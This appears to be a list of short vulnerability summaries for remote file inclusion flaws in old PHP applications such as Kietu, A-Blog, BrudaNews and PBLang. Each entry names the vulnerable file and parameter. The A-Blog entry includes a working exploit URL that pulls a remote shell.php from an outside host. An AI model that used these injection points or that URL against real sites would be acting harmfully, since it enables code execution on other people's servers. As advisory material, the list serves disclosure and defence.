Kietu? version 4.0.0b2z is affected by a remote file inclusion vulnerability caused by a lack of sanitization of user input in the hit.php file. An attacker can exploit it by sending a malicious URL in the url_hit parameter, which allows the attacker to execute arbitrary code on the vulnerable server.
paBugs 2.0 Beta 3 is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the vulnerable application. This may facilitate unauthorized access; other attacks are also possible.
A-Blog is affected by a remote file inclusion vulnerability. The vulnerable code is in the menu.php file in the navigation directory: <?php include ("$navigation_start"); ?> and <?php include("$navigation_middle"); ?>. An example exploit is http://www.site.com/ablog_dir/navigation/menu.php?navigation_start=http://marcusbestlamer.gay/shell.php?. The solution is to include mainfile.php in the page.
A vulnerability exists in webnews v1.4 due to improper sanitization of user-supplied input in the 'WN_BASEDIR' parameter of the 'parse/parser.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'WN_BASEDIR' parameter.
A vulnerability exists in faceStones personal version v2.0.42, due to improper validation of user-supplied input in the 'objpath' parameter of the 'fs_form_links.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, leading to arbitrary code execution on the vulnerable system.
A remote file inclusion vulnerability exists in BrudaGB v1.1 and v1.0. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the vulnerable server.
A vulnerability exists in BrudaNews v1.1 and v1.0 which allows a remote attacker to include a file from a remote host. The vulnerability is due to the 'o' parameter in the 'admin/index.php' script not properly sanitizing user-supplied input. This can be exploited to include arbitrary files from remote hosts by passing a URL as the 'o' parameter. Successful exploitation requires that 'allow_url_fopen' is enabled.
A vulnerability exists in Minerva <= v238, which allows a remote attacker to include a file from a remote location via the phpbb_root_path parameter in the admin/admin_topic_action_logging.php script. An attacker can exploit this vulnerability to include arbitrary files from remote locations, which can lead to the execution of arbitrary code on the vulnerable system.
A vulnerability exists in Software PBLang <= v4.66z due to improper validation of user-supplied input in the 'temppath' parameter of the 'templates/pb/language/lang_nl.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by supplying a malicious URL in the 'temppath' parameter.
Polaring is affected by a remote file inclusion vulnerability. The vulnerable code is located in the general.php file in the /view/ directory. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path in the _SESSION['dirMain'] parameter. This can allow an attacker to execute arbitrary code on the vulnerable system.